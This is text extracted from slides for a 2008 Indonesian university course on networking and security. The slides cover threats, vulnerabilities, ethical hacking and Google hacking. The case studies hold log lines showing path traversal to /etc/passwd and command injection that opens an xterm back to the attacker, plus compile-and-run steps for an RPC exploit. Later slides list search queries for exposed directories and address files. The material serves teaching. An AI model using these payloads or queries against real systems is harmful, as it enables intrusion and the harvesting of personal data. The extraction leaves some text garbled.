Computer Networking and and Security RUDI LUMANTO STMIK NUSA MANDIRI RUDI LUMANTO STMIK NUSA MANDIRI November 2008
Computer Networking andand
Security
RUDI LUMANTO
STMIK NUSA MANDIRI
RUDI LUMANTO STMIK NUSA MANDIRINovember 2008
Referensi dan Kontak InfoGlenn Berg“Networking Essentials”, New Riders Deborah Russel, G.T Gangemi Sr, “COMPUTER SECURITY BASIC”, O’Reilly & AssociatesyJohn E Caravan, “FUNDAMENTALS OF NETWORK SECURITY”, Artech Houseinternetinternet
KONTAK : RUDI [email protected]
0815-1036-9754
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
0815 1036 9754STMIK NUSA MANDIRI
KRITERIA PENILAIANKRITERIA PENILAIAN
TUGAS (2-4 report) : 20%UJIAN TENGAH SEMESTER : 30%%ABSENSI KEHADIRAN : 10 %UJIAN AKHIR SEMESTER : 40%UJIAN AKHIR SEMESTER : 40%
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
DAFTAR SILABUSDAFTAR SILABUS
OverviewNetwork standards (OSI)Network components Network protocol (TCP/IP)p ( )Network OS and ServicesNetwork/Internet SecurityNetwork/Internet Security
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
DAFTAR SILABUSDAFTAR SILABUSSoftware threats : virus worm etcSoftware threats : virus, worm etcInternet threats: TCP attack, DNS, DOS etc
i ll d i i SFirewall and Intrusion Detection System (IDS)Cryptography and its applicationsVPN
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
COMPUTER NETWORKING and
SECURITYSECURITY
OVERVIEW
Standar Keamanan Jaringan
Komponen Jaringan Ancaman Internet : TCP Attack, DOS, DNS dll
Ancaman Sofware : Virus, Worm dll
Protokol (TCP/IP)
Firewall dan IDS
Cryptography dan
OS dan LayananJaringan
Cryptography danAplikasi
VPN
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
COMPUTER NETWORKING and SECURITY
1 OVERVIEW1. OVERVIEW
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
outlineoutline
Simple cases and toolsWhy Computer Networking and Why y p g ySecurity ?Computer Security GoalsComputer Security Goals.Threats, Vulnerabilities, Attacks
li dPolicy and measureMaking a good security policy
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Simple case and tool( seing the( seing the technique/informasitionbehind a case)
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
A Security Case
A company called “Acme-art. Inc” doing an online business in the internet. They have a database that record all customers information included their credit cardi f i d d h i i h d b fi llinformation and connected to their site www.acme-art.com that protected by firewall.31 October 2001 a hacker intrude to their system and stole all credit card information, Then put the information into newsgroup usenet. A few hour then the company has loss million dollars bad reputation and have to invest many more money to keep theirloss million dollars , bad reputation and have to invest many more money to keep their business alive.
What happen ? How it could be happen ?
The firewall is installed. And the internet access can Fact :
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
only be done through http port 80.
Security team investigation: Sample case 1
Looking for clues in log file…
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
10 0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET /index cgi?page=falls shtml HTTP/1 0" 200 680
A
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] GET /index.cgi?page=falls.shtml HTTP/1.0 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
B
C10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
C
D
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1 0" 200 1228
E
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
F
Security team investigation: Sample case 1
Part A in log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsing …….g
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security team investigation: Sample case 1
Part B in log file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel jpg HTTP/1 0" 200 36580
g
10.0.1.21 [31/Oct/2001:03:03:18 +0530] GET /tahoel.jpg HTTP/1.0 200 36580
Browsing …….
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security team investigation: Sample case 1
l f lPart C in log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272[ / / ] / g / /
T i di tTrying direct access ….
Error response
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security team investigation: Sample case 1
Part D in log fileg10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking …
SecurityHole
1
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security team investigation: Sample case 1Perl script
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security hole 1: validation form for parameter variable will be transfer to index.cgi script
Security team investigation: Sample case 1
Part E in log filePart E in log file10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
Attacking …
SecurityHole
1
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Recovering passwd file
Security team investigation: Sample case 1
Passwd filePasswd file
root:x:0:0:root:/root:/bin/bash………………Lion:x:500:500::/home/lion:/bin/bash
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security hole 1 effect: recovering important “passwd” files
Security team investigation: Sample case 1
Part F in log file10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Attacking …
SecurityHole
2
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Direct execution to server commands
Security team investigation: Sample case 1
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0[ / / ] / g p g | p y+%26| HTTP/1.0" 200 1228
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Information/technique behind the case
Understanding about computer and networkInformation about targetgHTTP Structure CGI/PERLCGI/PERL LINUX system and its command
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Httpd file default structures what is the web site structure ?
Lisv01
/(root)
h bi bi dhome var sbin bin dev etc usr …
u01 u02 u03 … www httpd init.dlog
public_html html conf (default user’s directory) (default document root) httpd
httpd
httpd.conf
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
*Document root : The directory that holds HTML documents.* : file
11
WWW server
Client-side application
Behind the Web
WWW server
WWW browser
Internet/Intranet
WWW server software
HTML&Intranet server_software Script
Execute application
N t k l di li ti
JAVA SCRIPT
WWW server software A li ti
WWW serverNetwork-loading application
WWW browser
Internet/I t t
WWWブラウザ
server_softwareApplication
Application
S id li ti
Intranet
Execute applicationJAVA Applet,Active X
WWW server
WWW Server
Server-side application
WWW browser
Internet/
Active X
CG
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
ApplicationServer_software
Internet/Intranet
Execute application
CGI,Active Server Pages
S 2Sampe case 2
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Sample case 2
After a period of new reqruitment,a server in a company suddenly crash down. Company network become unavailable for a while and it led to the much loss in production.a while and it led to the much loss in production.
What happen ?What happen ? How it could be happen ?
No Log files indication !!!
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Security team investigation: Looking for clues by social engineering
O l i ll h i d 2000 i hi d
Sample case 2
One new employee install the windows 2000 server in his computer and connect tothe LAN with global IP address.
Other Clues : 1. Nessus report on vulnerabilies in windows 20002. exploit program available
Analysis of Host
Nessus report on
Address of Host Port/Service Issue regarding port
192.168.27.31 ftp (21/tcp) Security hole found
192.168.27.31 smtp(25/tcp) Security hole foundpWindows 2000 serverafter IIS installation
192.168.27.31 http (21/tcp) Security hole found
192.168.27.31 nntp (119/tcp) Security hole found
192.168.27.31 msrpc(135/tcp) Security hole found
192.168.27.31 Netbios-ssn (139/tcp) Security not found
192.168.27.31 https (443/tcp) Security not found
192.168.27.31 Microsoft-ds (445/tcp) Security hole found
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
…… …. ….
…… …. ….
NESSUS report in detail
Sample case 2
Other references: IAVA:2003-A-0012
NESSUS report in detail
NESSUS ID:11835
Vulnerability msprc(135/tcp) The remote host is running a version of windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code y yand gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution : see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspxRisk factor: highCVE:CAN-2003-0352BID:8205Other referemces: IAVA:2003-A-0011NESSUS ID: 11806
Warning msprc(135/tcp) Distributed Computing Environment (DCE) services running on the remote host
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
remote host
NESSUS ID : Identity Number of Vulnerability Check by NESSUSBID : Buqtraq ID : related documentation regarding the vulnerability including
Sample case 2
BID : Buqtraq ID : related documentation regarding the vulnerability including exploit code , see: security focus site
simulation
1. Downloading the exploit code source file (from security focus site or Whoppix CD)$cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
simulation
p p p y2. Compiling source file
$gcc oc192-dom.c3. executing the exploit into the IP target machine
$a out d 192 168 94 204$a.out -d 192.168.94.204
Get the system access
C:>WINNT\SYSTEM32\
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Information/technique behind the case
-Understanding about network-Insufficient security orientation for new employeeL k f k l d b t OS-Lack of knowledge about OS
-There is always exploit code in the internet-Lack of information about update
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Why Computer Network ?Why Computer Network ?
1. File sharing memungkinkan akses terhadap sebuah file kapan saja dandimana sajaj
2. Effective data transfer Pengiriman data dengan cepat dan efisien3. Hardware sharing Dapat menggunakan bersama satu printer, hardisk dsb4. Realtime communication Dapat melakukan hubungan komunikasi via teks,
audio gambar ataupun video secara realtime
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
audio, gambar ataupun video secara realtime5. Operational cost reduction mengurangi biaya komunikasi telpon, pemakaian
kertas, pengiriman surat dsb.
File/Information resources sharingg
Information resources : printer, data, files
Users can share a printer connected to LAN.There is no need to connect to a printer to each printereach printer
Users can share data on the computers,User in computer C can handle files on Computer B as if they were his own files
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Effective data transfer
- The data transmission speed is scores to several hundred Mbps. For example, A4 sized document (30Kbytes) can be transmitted over a LAN in 0.024 second.
bps (bits per second) = a unit rate at which data can be transmitted over a communication line expressed
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.
Hardware sharing
- Effective use of hardware (Printer, Hard disk etc)
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
( )- Easy to add new computers or relocate existing computers- Easy to connect to computers of different vendors
Contoh Kegunaan JaringanSeat Reservation Network
- Inquiries are issued from various places- Connected to seat reservation databaseon the central computer- Answer to inquiries are generated Immediately- Also in updating databases and issuesAlso in updating databases and issuesa ticket
Example of similar system: money withdrawal, balance inquiry etc
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Type of Networkyp
Mainly divided into 2 types based on their scale (area that a network
covers).covers).
LAN is implemented within a building or Factory.
WAN is implemented by connecting two or more LAN between office and laboratories, or two countries
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Why Computer SecurityWhy Computer Security
T t t /i di id l tTo protect company/individual assets– Hardware, software and INFORMATION (data, ability
and Reputation)and Reputation)
To gain a competitive advantage– How many people will use a bank’s internet banking y p p g
system if they knew that the system had been hacked in the past ?
l i h l iTo comply with regulatory requirements To keep your job
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Computer Security GoalsComputer Security GoalsC onfidentialityC onfidentialityI ntegrity
A il bilitA vailability
Confidentiality : Prevention of unauthorized access to data, and accidental dataConfidentiality : Prevention of unauthorized access to data, and accidental data disclosures
Integrity : Prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) O ti d t b th i d l i th t i i tibl2) Operation on data by authorized personnel in ways that is incompatible with the nature (syntax) of the data, leading to its corruption.3) Any modification to append-only records, to alter their evidence value.
Availability : Measures to protect data should not result in making it difficult
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
y p gto access and modify the data in ways in which it was intended.
Threats,vulnerabilities and Attacks
Anything that can disrupt the operationTHREATS
Anything that can disrupt the operation, functioning, integrity or availability of computer systemcomputer system.
Stand alone threats– Threat arise without any connection to other system, Ex:
virus password crackervirus, password cracker
Connection threats– Threat arise because of connection to other system
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
◆Threats Arising from Connection to the other computers
Information leaks •• A database of customer information, including credit card numbers is leaked from an Internet service provider
Falsification
numbers, is leaked from an Internet service provider.
•• The contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of services
rewritten with the political messages of a dissident group.
•• A bookshop site is attacked and its server goes down, discontinuing service.
Impersonation
d sco t u g se ce
•• An intruder fakes a membership site for the purchase of merchandise.
Attack platform •• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
damage caused.
Vulnerabilities Weakness in the design, configuration or
implementation of a computer system thatimplementation of a computer system that renders it susceptible to a threat.
1. POOR DESIGN Hardware and software system that contain design flaws that can beexploited Ex: sendmail flaws in early version of unix that allowedexploited. Ex: sendmail flaws in early version of unix that allowed hackers to gain privileged root access
2. POOR IMPLEMENTATIONSystem that incorrectly configured because of in-experience insufficientSystem that incorrectly configured because of in-experience, insufficienttraining or sloppy work. Ex: a system that does not ave restricted access Privileged on critical executable file.
3. POOR MANAGEMENT
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Inadequate procedures and insufficient checks and balances. Ex: No documentation and monitoring
Critical Vulnerabilities and Vulnerability Scanning
Certain security vulnerabilities are declared critical when they are (or are about to) being actively exploited and represent a clear and present dangerUpon notification of a critical vulnerability, systems must be patched by a given date or y p y gthey will be blocked from network access
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
◆Types of Vulnerability
OS/Program name Cause InfluenceIndex Server ( WindowsNT)Index Service (Windows2000)
ISAPI extension idq.dll overflow
Local system permission seized by an outsider
telnetd (FreeeBSD 4.3 and Buffer overflow during AYT Telnetd permission (normally (earlier, Red Hat 7.1 and earlier, etc.)
goptional packet processing
p ( yroot) seized by an outsider
sadmind (Solaris2.3 – 7) Buffer overflow during NETMGT_PROC_SERVICE
Command executable with root permission by an outsider
request processingSSH 1.2.31 OpenSSH 2.2 and earlier
Overflow in an int variable in detect_attack function
Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX Buffer overflow in a shared Arbitrary command p (11.11, Solaris 8, etc.) library
yexecutable with root permission by an outsider
Bind8.2x(Red Hat, Turbolinux, Solaris, AIX , etc.)
Buffer overflow during TSIG processing
Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat linux 6.2 and earlier, etc.)
Format string bug in site-exec and setproctitle functions
Execution permission (normally root) seized by an outsider
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
IIS4.0 (WIndowsNT)IIS5.0 (Windows2000)
Access to a file outside root directory permitted when path name is UNICODE
Shell command executed with IUSR_Machinename permission by an outsider
ATTACKSA specific technique used to exploit a vulnerabilty.Ex: a threat could be a denial of service, a vulnerability, y
is in the design of OS, and an attack could be a “ping of death”
Passive attacksPassive attacks– Gathering information by monitoring and recording
traffic on the network, or by social engineering. Ex: packet sniffing traffic analysispacket sniffing, traffic analysis
Active attacks– Overt actions on the computer system
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Overt actions on the computer system.
◆Denial of ServiceService downedTarget host Service downed due to overloadTarget host
• Large volume data
Attack platform
• Large volume data
• Packets causinga system down
Start attack!!
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Policy and MeasurePolicy and MeasureSecurity Trinity : foundation for all security policies and measures that an organization develops and deployg p p y
What is Security ?Definitions from the Amer.Herit.Dic : - Freedom from risk or danger:safety
Measures adopted To preventSecurity
Prevention
- Measures adopted …. To prevent a crime.
Computer Security Measures-Mechanisms to prevent, detect and recover from threats and attacks orfor auditing purposes.
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Key pointComputer Security is not only a technical
problem it is a business and peopleproblem, it is a business and people problem.
Th t h l i th t th diffi ltThe technology is the easy part, the difficult part is developing a security policies/plan th t fit th i ti ’ b ithat fits the organization’s business operation and getting people to comply with th lthe plan.
Social engineering : non-technical methods hackers employ to gain access to
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
g g p y gsystem, refers to the process of convincing a person to reveal information
Security operations
-Prevention againts accidental capture or modification ofg pinformation
-Detection of all improper access to data and system resources
R-Recovery from unauthorized access, restoring data values, system integrity etc
Policies and ProceduresU i il d-User privileged-Data backup
-Security tools to deploy-Monitoring the integrity
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Monitoring the integrity-Response to Incident
-User role, etc
◆Types of Users
Hacker A user who tries to obtain access using advanced knowledge g gand techniques.
Cracker A user who attempts sabotage and other subversive activities with malicious motives
Script kiddy A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks
Corporate network
Intrusion, subversion, sabotage
Subversion, sabotageVulnerability
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
◆Integrity Check Tool
/etc/passwd file
dc577ef5f97b671781c04425737bc4df
#hash value (MD5)
File editing/falsification Mismatch ... Altered!!
b0ed782bbd4c8445f07538a3ede788eb
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
◆Security Tools and Security Products
Server/clientC t t kMalicious user
Malicious user
Server/clientCorporate network
Internet
• Router(Filtering)• Firewall(VPN)
• H-IDS• Log monitoring
Countermeasures against hacking
Network security Server security
Firewall(VPN)• N-IDS• Vulnerability audit
• Log monitoring• Falsification prevention• Vulnerability audit
against hacking
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
• Virus scan• Encryption
• Virus scan• Encryption(SSH)
Miscellaneous
◆Firewall?
I t tInternet Intranet
Public WWW server
① HTTP
Client Public FTP server
② HTTP
③ FTP
④ HTTP
⑤Unspecific AP
ClientServer
Authentication
P k t filt i
GW type firewall
• Packet filtering
• Application gateway
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
• Stateful inspection
◆Encryption VPN(Virtual Private Network)=Leased Linethe Internet e.g. IPsec IPv6
FW/VPN
Remote access user
FW/VPN router
Provider A Provider C
Encrypted Encrypted communicationcommunication
Internet IX
Provider A Provider C
Provider BProvider D
FW/VPN router
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Making a good securityg g ypolicy
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Making a good security policyMaking a good security policy
Penetration Test/Ethical Hacking– Understanding what is inside the hackers g
mindSecurity Trinityy ySecurity Goals
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Definition of "Ethical Hacking“
A thi l h ki i h t d t k t hAn ethical hacking is where a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system ethical hacking uses the same methods as their lesssystem, ethical hacking uses the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing intrusion testing and red teaming Individuals involved intesting, intrusion testing, and red teaming. Individuals involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. g yOne of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming i i l t id th t d t h l
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the Hackers MindS f ll k d S
Focus on the target- Successfully attack and Save -
Never use your own informationNever leave your footstepy pCan ever back again
HACKERS PROCEDURE
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Hackers Procedure/stepHackers Procedure/stepTargetingScanningRemote Attack 1. Information gathering
Local AttackLog removing / deception
2. Attack, intrusion
3. Unauthorized actLog removing / deceptionSpace usingTime stamp
4. Actions taken after unauthorized act
Time stamp Back door
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Example of Targeting
All Informations about the target
Technique name : Web browser targetingGoals : personal information about the targetOperation base any web browser with search engine siteOperation base - any web browser with search engine site
(google)- online database (WHOIS, IP-CONVERSION,etc)
Location, related company/organization, news, telephone number,Contact (mail address), web author idea/though,/behaviour, site software
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Targeting with google
By using the basic search techniques combined y g qwith Google's advanced operators, anyone can perform information-gathering and p g gvulnerability-searching using Google. This technique is commonly referred to as Google q y ghacking.
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hacking
Mastering google using its standard optionsg g g g p– Double quotation ….to be recognized a keyword as a phrase
– Hyphen (-) …. If you want to exclude words contain keyword
i– site: …. searching only inside the site– * …. wildcard. Use with double quotation to find any
indicate word
– Intitle: …. search limited only to web title– Inurl: …. search limited only to web page URL
I t t h li it d l t i f th– Intext: …. search limited only to main page of the web
– Filetype: …. search focusing on extention type of
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
file– Phonebook: …. search telephone number
Google hackingMastering google using its optionsMastering google using its options– site: …. searching only inside the site
“hacker” site:www.cnn.com or site:www.cnn.com hacker
This query searches for the word hacker, restricting the search to therestricting the search to the http://www.cnn.comweb site. How many pages on the CNN web server contain the word hacker
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its options– * …. wildcard. Use with double quotation to find any indicate word
“He is a * Hacker”
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its standard optionsaste g goog e us g ts sta da d opt o s– intitle: …. search limited only to web title
intitle: “Hacker”
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its standard optionsMastering google using its standard options– Inurl: …. search limited only to web page URL
inurl: www.securityfocus.com
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its standard optionsg g g g p– intext: …. search limited only to main page of the web
intext: “earthquake”
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its standard optionsg g g g p– Filetype: …. search focusing on extention type of file
“hacking” filetype:ppt" h i " fil i"whoppix" filetype:iso
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Google hackingMastering google using its standard optionsg g g g p– Phonebook: …. search telephone number
phonebook: John Doe CA
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public
More on Google hacking
Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public
Finding on server directory listingDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering
Most directory listings begin with the phrase Index of which also shows in the title AnIndex of, which also shows in the title. An obvious query to find this type of page might be
intitle:index.ofwhich may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Index of Native American Resources on the InternetLibDex—Worldwide index of library cataloguesIowa State Entomology Index of Internet Resources
More on Google hacking
C bi i l i i
Several alternate queries that provide more accurate results:
Combination google options on queries
q pintitle:index.of "parent directory" intitle:index.of name size These queries indeed provide directory listings by not only focusing on index of in the title but on keywords often foundfocusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches
fi d fil f di i l d i di li ito find files of directories located in directory listings.
Example:pName Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
bbs.dat inurl:"Index of" intitle:“Index of“
Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
More on Google hacking
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
More on Google hacking
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Example:bbs.dat inurl:"Index of" intitle:“Index of“
More on Google hacking
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Example: searching database of address people written in csv focusing to japan sitefiletype:csv address site:jp
More on Google hacking
yp jp
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Example: searching database of address people written in EXCEL focusing to UK sitefiletype:xls address site:uk
More on Google hacking
yp
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
THANK YOU
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008
Th D f th N tThe Dawn of the Net
RUDI LUMANTO STMIK NUSA MANDIRI, November 2008